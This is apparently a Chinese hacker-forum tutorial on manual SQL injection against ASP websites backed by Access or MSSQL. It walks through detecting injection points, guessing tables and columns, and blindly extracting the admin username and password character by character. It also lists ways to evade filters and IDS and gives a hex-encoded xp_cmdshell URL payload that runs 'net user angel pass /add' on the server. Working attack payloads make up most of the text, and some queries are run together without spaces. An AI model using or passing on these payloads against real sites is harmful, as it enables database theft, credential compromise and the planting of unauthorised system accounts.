手工注入详解

1.检测注入点：

一般是在连接的后面添加and 1=1 and 1=2 如果2次返回的页面不同就意味着存在注入漏洞。

注入点我找好了！

2次返回不一样，说明存在注入漏洞！

2.猜解表名：

在注入点后面输入 and(select count(*) fromadmin)<>0  猜admin的表是否存在（返回正常则存在admin的表名，返回错误就是不存在admin的表名）admin 的表名存在，再来看看其他的，返回错误，说明没有这个表名！继续！

3.猜解列名：

同上面的猜解表名没有多大区别and (select count(字段名) from 表名)<>0同样是看返回的页面，返回正常则“此字段”存在 ！admin中存在username 试试password2个都存在！

4.猜解管理员个数：and(select count(*) from admin)=1  =1也就是一个的意思！=2就是2

(同样是看返回页面)

看样子只有一个管理员！！

5.猜解管理员用户名和密码的长度：

and (selectlen(username) fromadmin)>=1、>=2、>=3、>=4、>=5、>=6

(同样是看返回页面)一直把数字从1开始加，加到返回错误为止！  错误的数字即是用户名的长度

10返回错误，说明是9位继续测password 14返回错误，说明是13位

username 9位password 13位

6.猜管理员用户名：

最为关键的部分了...仔细看吧！

and (selectcount(*) from admin where (asc(mid(username,1,1))) between 30 and130)<>0

username的字段第一个字符的ASCII码在30—130之间，然后再次缩小范围提交，直到返回正确为止！

然后对照ASCII码表，即可猜解出管理员帐号的第一个字符。

猜解第2位则and(select count(*) from admin where (asc(mid(username,2,1))) between30 and 130)<>0

范围在45－48之间！很小了

说明username的第一个字符是48对照ASCII就可以知道第一个字符是什么了！

还要猜8次！ 48 51105   0 3 i（要区分大小写） 0 3 itadmin

密码  9798 99  a b c 应该没错 a bc    d123498765

最后用明小子来弄吧！

验证一下！是51还是验证下好，免得错误

为了节省时间我就密码帐号各破解3位，然后用明小子解决！

and (selectasc(mid(username,1,1))from admin)=这里填范围！

PS：ASCII码学过计算机一级的因该知道这是什么～我就不多说了

顺便附送ASCII码对照表http://dev.csdn.net/article/41/41977.shtm

7.猜解管理员密码

同6是一样的，只不过是换了个“列”而已！

上面已经演示了！

嘿嘿其实手工注入就是这样，但是用工具就比较快，但是，如果没有工具呢？

学一下总比不学好！！！！！

现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷！

突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“'”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵网站所以也不敢对上述过滤的效果进行评论，但是可以肯定的是，效果不会很好……

经过我的收集，大部分的防注入程序都过滤了以下关键字：

and | select |update | chr | delete | from | ; | insert | mid | master. | set |=

而这里最难处理的就是select这个关键字了，那么我们怎样来突破他们呢？问题虽未完全解决，但还是说出来与大家分享一下，希望能抛砖引玉。

对于关键字的过滤，以下是我收集的以及我个人的一些想法。

1、运用编码技术绕过

如URLEncode编码，ASCII编码绕过。例如or1=1即or1=1，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

2、通过空格绕过

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如or'swords' =‘swords' ，由于mssql的松散性，我们可以把or 'swords'之间的空格去掉，并不影响运行。

3、运用字符串判断代替

用经典的or1=1判断绕过,如or 'swords' ='swords'，这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过

可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or'swords' = N' swords' ，大写的N告诉mssql server字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过

效果值得考证，但毕竟是一种方法。如or 'swords' =‘sw' +' ords' ；EXEC(‘IN' +' SERT INTO '+' …..')

6、通过LIKE绕过

以前怎么就没想到呢？如or'swords' LIKE'sw'！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

与上面的LIKE的思路差不多,如or'swords' IN ('swords')

8、通过BETWEEN绕过

如or 'swords'BETWEEN 'rw' AND 'tw'

9、通过>或者<绕过

or'swords' > 'sw'

or'swords' < 'tw'

or1<3

……

10、运用注释语句绕过

用代替空格，如：UNIONSelect user，pwd，from tbluser

用分割敏感词，如：UNION SE LECT user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00=hex(sysadmin)

0x640062005F006F0077006E0065007200=hex(db_owner)

另外，关于通用点的过滤方法，我们可以考虑采用赋值的方法，例如先声明一个变量a，然后把我们的指令赋值给a，然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下：

　　declare @asysname

　　select@a=

　　execmaster.dbo.xp_cmdshell @a

效果http://www.ilikeplmm.com/show.asp?id=1;declare@a% 20sysname select@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400exec master.dbo.xp_cmdshell @a;--

其中的0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400就是“net user angel pass /add”的意思。

  正是因为注入攻击的流行，使的市面上的注入工具层出不穷！比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等！这大大方便的小菜们掌握注入漏洞！可是，工具是死的，注入的手法却是活的，能否根据实际情况灵活地构造SQL注入语句，得到自己想要的信息，是[被屏蔽的不受欢迎关键词]高shou与小菜的根本区别！只用工具，而不去管它的原理，是不可能得到提高的，当然，在遇到一些特殊情况的时候，那些只会用工具的小菜们也只能放弃了！所以学会手工注入自己构造SQL注入语句是一个黑客爱好者必上的一堂课！我希望这篇文章能够给那些还不会手工注入的朋友一点启发！帮助大家早日摆脱工具，早日踏入[被屏蔽的不受欢迎关键词]高shou的行列！

  恶补基础：

  要想学会手工注入，有一个名词是不得不提的，那就是数据库系统！

  1。简介

  数据库系统分为数据库和数据库管理系统！数据库是存放数据的地方，数据库管理系统则是管理数据库的软件！数据库中数据的存储节构叫数据模型！有四种常见的数据模型，分别是层次模型、网状模型、关系模型和面向对象模型。其中关系数据模型是最主要的数据模型，ACCESS、MSSQL、ORACLE等都是关系模型数据库系统。其中以ACCESS、MSSQL数据库系统最为常见！这些都是理论的知识，希望大家理解！

    2。基本概念

    表：表是一个关系数据库的基本组成元素！它按行与列组合排列成相关信息。通常行称为记录，列称为域。每个域称为一个字段！每一条记录都由多个字段组成。每个字段的名字叫做字段名，每个字段的值叫估字段值。表中的每一行即每一条记录都拥有想同的结构！

  3。注入的条件

  只有调用数据库的动态页面才有可有存在注入漏洞，动态页面包括asp php jspcgi等。本文只讲对ASP页面的注入。那什么是调用数据库的页面呢？比如这样的形势：asp?id= php?id=这样的样子的都是调用数据库的页面。"?"后面加的id的名字叫变量，注意这个变量是可以随便换的，"="号后面的值名字叫参数！这个参数也是可以变的！大家的思路一定要灵活，要学会举一反三，不要太死板！

   4。注入漏洞的原理分析：

  程序对用户提交的变量没有进行有效的过滤，就直接带入查询语句中，这样，我们就可以提交具有数据查询功能的语句，加入到程序将要提交的信息中去，再根据服务器返回的信息来判断数据库里的内容！光这样说大家可能不太好理解，不要紧，接着往下看。

   有关的基础已经讲完了 下面开始实战练习部分！

   实战部分

  如果是刚刚接触注入的新手朋友，我们要做的第一步就是，用鼠标右键点击桌面上的IE图标，再点属性，然后再点“高级”，然后往下拉滚动条，找到“显示友'好'HTTP错误信息”，把前面的勾去掉，再点“确定”，这样做是为了让我们得到更多的服务器返回的信息！

    第一部分：ACCESS数据库手工注入

    1。判断是否存在注入漏洞：

   这个相信大家都应该知道！ 就是在一个调用数据库的网址后面加上分别加上 and 1=1和 and1=2 ，如果加入and 1=1返回正常（就是和原来没有加 and 1=1时页面样子的一样)，而加入 and1=2返回错误（和原来没有加 and 1=2时页面的样子不一样），就可以证明这个页面存在注入漏洞。比如：

http://www.xxx.com/a.asp?id=7，这个网页，我们在后面加上 and1=1(两个空格，and前面一个，and和1=1之间一个！)，网址就变成了

http://www.xxx.com/a.asp?id=7 and1=1，用IE打开这个网页，返回正常！再尝试在后面加上and 1=2，网址就变成了

http://www.xxx.com/a.asp?id=7 and1=2，同样用IE打开这个网页，返回错误！这就说明这个网页http://www.xxx.com/a.asp?id=7存在注入漏洞，是一个注入点！（存在注入漏洞的网页叫注入点！）

可是，并不是所有的页面都可以这样判断，有的页面不管你加入and 1=1 还是 and1=2，返回的都是错误的页面，难道这样的页面就没有注入漏洞吗？不一定！比如这个页面：http://www.xxxxxx.com/b.asp?id=ade7,不管我们在后面上的是and 1=1还是and1=2，它都返回错误的页面！这个时候我们就要尝试用另一种方法来测试漏洞了，这种方法可以说是and 1=1和and1=2的变种方法。原来的网址是这样的：http://www.xxxxxx.com/b.asp?id=ade7，现在我们把它变成这个样子：http://www.xxxxxx.com/b.asp?id=ade7' and'1'='1，用IE打开它，看看返回正不正常！如果正常，那就可以接着用这个地址来进一步测试漏洞是否存在（如果返回不正常那这个页面就很有可能不存在注入漏洞！）：http://www.xxxxxx.com/b.asp?id=ade7' and'1'='2 ，用IE打开这个网址，如果返回错误的话，那这个网址http://www.xxxxxx.com/b.asp?id=1就存在注入漏洞！

   A。数字型参数注入点分析！

   这时肯定有朋友要问了，为什么用一开始那种and 1=1 and1=2不行呢！呵呵，先不要急，先看看这两个存在注入漏洞的页面有什么不一样？

  （你不要告诉偶第二个网址比第一个网址多了几个X），相信大家已经看到了，第二个网址后跟的参数是ade7，是字符！而第一个网址后跟的参数是7，是数字！就是因为这里，才引起了测试漏洞的语句的不同！学过数据库的朋友们应该知道，在查询中，字符型的值，是要用单引号包起来的，也就是这个样子'字符型数据'。这里假设第一个注入页面所对应的查询语句是这样的（凡是调用数据库的页面都会有一条或者几条对应的查询语句，用来对数据库里的内容进行查询！）

   :select * from 表名 whereid=7。这是原来的那条查询语句，这条语句是正确的，可以在数据库中查询出相应的内容！可是如果我们在网址后面加上了 and1=1，那这条查询语句就会变成select * from 表名 where id=7 and1=1(这下知道了注入漏洞原理分析那里讲的变量没有过滤的意思了吧！），这里有必要说一些数据库的有关知识，这条语句里，and是逻辑运算符！（这个记住就行了），用中文翻译过来就是“和”的意思！在高中的数学里讲过，用“和”来连接的两个句子，必须都是真的，不然整个句子就不是真的！比如：苹果和大象都是水果。这句话就是错的，苹果是水果，可是大象不是！这下大家应该可以理解“用“和”来连接的两个句子，必须都是真的，不然整个句子就不是真的”这句话了吧。如果换成苹果和梨都是水果，那这句话就是对的。知道了and的用处后，再回来看select* from 表名 where id=7 and 1=1这个句子，and 前面的select * from 表名 whereid=7肯定是对的，（为什么呢，如果这条查询语句都不对，那这个注入页而就有问题了！所以and前面的那个句子一定是对的！）。再看and后面，1=1，不用我说了吧，也是对的（难道一不等于一吗？）根据刚才说的and用处，现在我们可以判定select * from 表名 whereid=7 and 1=1这条查询语句，仍然是对的！所以它还是可以正确地从数据库里查询出信息，返回给我们！

   举一反三，那这个句子：select * from 表名 where id=7 and1=2，肯定是不对的了，那这条查询语句就不能正确地从数据库里查询出信息，所以我们就会看到一个错误的页面！以上是注入点参数是int(整数型）时的分析！

    B。字符型参数注入点分析

   和刚才一样，我们先来看第二个字符型注入页面里的查询语句，比如是这个select * from 表whereid='ade7'(为什么加引号？看前面吧！)。原来的查询语句是这个样子的，如果我们还按照数字型参数的那种测试漏洞的方法的话，语句就会变成这样：select * from 表 where id='ade7 and 1=1'和

select * from表 where id='ade7 and 1=2'，因为程序会自动查询引号里的内容，如果我们按前面这两个语句这样提交的话，程序就会查询id值为ade7 and 1=1和ade7 and1=2的记录，这样是查不到结果的（你可不要告诉我数据库里正好有两个记录的id就是ade7 and 1=1 和and1=2）。这里可能有朋友要问了，为什么不是查询id为'ade7,然后and1='1呢？好，我现在回答你们，就算可以查询id值为'ade7的记录，那这个句子也是错的，1怎么会等于'1呢？对吧？更何况程序是不可能查询'ade7的，更准备的说是数据库中不可能有一个字段的值是'ade7，因为这个字符串少一个引号，如果直接把这个字符串存入数据库的话，程序会报错的！怎么样？明白了吧？

   现在再说用 ' and '1'='1和' and'1'='2来测试的的原理！同样是这个查询语句：

select * from表 where id='ade7'，如果我们在网址后面加了' and '1'='1，那这个查询语句就会变成

select * from表 where id='ade7' and'1'='1'(这里最外面的那一层引号是程序自动加上的)，变成这个样子！这个语句对不对呢？我们分析一下。如果我们提交个语句，那程序就会自动查询id值是ade7的记录！因为这个记录是存在的（不存在的话那就是这个网页有问题了！），然and后面跟的'1'='1'是正确的，所以这个语句是正确的！如果我们把'and '1'='1换成' and '1'='2，那语句就成了select * from 表 where id='ade7' and'1'='2'，只看后面我们就可以知道这个语句对不对了！'1'怎么可能等于'2'呢？是吧？好了，字符型参数的注入点的原理就介绍到这里！

    2。数据库类型的判断

  在确定了一个地址是注入点后，我们首先要判断这个注入点所连接的数据库的类型！这里介绍几种简单的方法。如果一种判断不出来就再换另一种判断方法！

    A。在注入点后直接加上单引号。有的时候我们可以根据服务器报错的信息来判断它用的是什么数据库。通过这个错误信息我们可以看出来这个注入点所连接的数据库的类型是ACCESS，为什么呢，仔细看！它说的是MicrosoftJET Database Engine 錯誤 '80040e14'，说明是通过JET引擎连接数据库，而不是ODBC！如果是用JET方法连接的话就说明用的是ACCESS数据库，如果是ODBC的话就说明数据库是MSSQL！这个记住就行了。其实还有详细的错误信息，它直接把数据库的类型告诉你了！因为我没有找到这样的注入点，这里就截不了图了。大家遇的到话肯定一眼就可以看出来！

B。在注入点后加上（注意，你先确定了它是注入点后再加，不是注入点你加了也没用！)：;--（一个分号，两个横线！）比如这个网址

http://www.xxxxxxxx.com/article/as.asp?id=875，我们事先已经确定了它是注入点了，这样的话我们就可以在后面加上;--让它变成

http://www.xxxxxxxx.com/article/as.asp?id=875;--提交这个网址，如果页面返回正常的话，说明数据库是MSSQL。因为在MSSQL数据库里，；和--都是存在的，";"用来分离两个语句，而"--"就是注释符，在它后面的语句都不执行！而ACCESS数据库里没有！所以如果是ACCESS的数据库，当你在注入地址

后面加上";--"的话那程序就会把";--"当成参数的一部分，这样查询就会出错！如果错误，那基本上可以肯定是ACCESS了（因为网上用这两种数据库的网站最多！）

  C。用以上方法都判断不出来的话，那可以用这一招！利用ACCESS和MSSQL数据库的差异来进行判断！要用到两个查询语句！同样，如果注入点是http://www.xxxxxxxx.com/article/as.asp?id=875，那我们在后面加上and exists (select count(*) from sysobjects),那么地址就变成了

http://www.xxxxxxxx.com/article/as.asp?id=875 andexists (select count(*) fromsysobjects)。如果页面正常返回，那就可以证明数据库是MSSQL的。我来解释一下这个语句：这个句子的意思是查询sysobjects表里的记录数大于0！（有点别扭！）如果返回正常，说明大于0，也就说明存在sysobjects这个表，因为这个表只有MSSQL数据库里才有，所以可以确定数据库的MSSQL的！如果返回错误，那就不是！那我们怎么用查询语句来判断数据库是不是ACCESS的呢！别急，往下看！我们在注入点后加上and exists (select count(*) from msysobjects)。就成了

http://www.xxxxxxxx.com/article/as.asp?id=875 andexists (select count(*) frommsysobjects)，按刚才理解MSSQL数据库的方法去理解这条语句！这里要注意，提交这个语句是不会返回正常页面的！就算是ACCESS数据库也不会返回正常的页面！因为默认情况下，我们是没有权限查询这个表里的数据的！不过WEB会提示我们“记录无法读取;'msysobjects'没有读取权限”！如果返回的是这个错误信息的话，那就证明是ACCESS数据库了！！简单地来说就是两条查询语句：

and exists(select count(*) from sysobjects)

and exists(select count(*) from msysobjects)

    如果第一条返回正常，那就是MSSQL数据库，如果两条都不正常，那就是ACCESS数据库了（这里只讨论MSSQL和ACCESS)

    注意：上面讲的全是参数是int的时候的检测方法，如果参数是字符型的，那就先要在参数后面加上单引号，然后再在查询语句最后加上";--"

    3。猜表、字段名、检测记录数、检测字段长度。

  我按照工具注入的流程给大家讲！

   A。猜表！

   用到的语句：and exists (select count(*) from 你要猜的表名)。在注入点后加上这句话，如果返回正常，说明你猜的表是存在的！比如

http://www.xxxxxxxx.com/article/as.asp?id=875 andexists (select count(*) fromadmin)，如果返回正常，说明admin这张表存在！如果返回错误，就说明不存在！。别的表也都是这么猜！

   B。猜列！

   用到的语句：and (select count(列名) from猜到的表名)>0 。在注入点后加上这句话，如果返回正常，说明你猜的列是存在的！比如

http://www.xxxxxxxx.com/article/as.asp?id=875 and(select count(username) fromadmin)>0，如果返回正常，那username这个列就存在！不过首先要确定from后面跟的表名要是存在的哦！不然你怎么猜都是错的！

    C。检测记录数

   用到的语句：and (select count(*) from猜到的表名)>X（X是个数字）。在注入点后加上这句话，并不停地变换X这个数字，直到猜到准确的记录数为止！比如http://www.xxxxxxxx.com/article/as.asp?id=875 and(select count(*) from admin)>2，这个句子是猜admin表里有几条记录的，也就是有几个管理员（因为一个管理员对应一条记录嘛！）。如果返回正常，说明admin这张表里的记录数大于2。这个时候我们把2改成别的大一点的数！比如5，如果返回错误，说明管理员的个数在2和5之间，2和5之间的整数是3和4，这个时候我们变换语句为http://www.xxxxxxxx.com/article/as.asp?id=875 and(select count(*) fromadmin)=3或者=4，哪个返回正常那管理员的个数就是哪个。如果提交>5还返回错误，那就再取一个更大的数，再重复刚才的动作就可以猜到记录数！

   D。检测字段长度

   用到的语句：and (select top 1 len(列) from表)>X (X和刚才一样！)。我来解释一下这个句子，select top1是查询第一条数据的意思！（在WEB环境下不支持多行回显！只是一次查询的数据不能超过一行！）,len是MSSQL里的一个函数，用法是len(),（）里可以是字符串也可以是表达式也可以是列名！知道这些，大家应该可以看懂了吧！后面那个X的变换方法上面的一样！